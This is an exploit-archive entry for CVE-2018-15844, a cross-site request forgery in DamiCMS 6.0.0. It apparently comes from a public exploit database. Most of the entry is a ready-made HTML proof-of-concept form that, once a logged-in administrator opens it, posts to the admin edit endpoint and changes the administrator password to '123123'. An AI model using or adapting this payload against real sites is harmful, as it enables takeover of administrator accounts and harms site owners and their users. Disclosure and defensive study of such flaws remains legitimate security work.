damicms 6.0.0 crosssite request forgery (change admin password)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password) # Author: Autism_JH # Date: 2018-08-30 # Vendor Homepage: https://github.com/731276192/damicms # Software Link: https://github.com/731276192/damicms # Version: 6.0.0 # CVE: CVE-2018-15844 # Description: # DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword. # After the administrator login in,open the poc,the administrator account's # password will been changed to 123123 # POC: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="password" value="123123" /> <input type="hidden" name="role_id" value="1" /> <input type="hidden" name="id" value="1" /> <input type="hidden" name="Submit" value="确定修改" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Damicms 6.0.0 crosssite request forgery (change admin password) Vulnerability / Exploit Source : Damicms 6.0.0 crosssite request forgery (change admin password)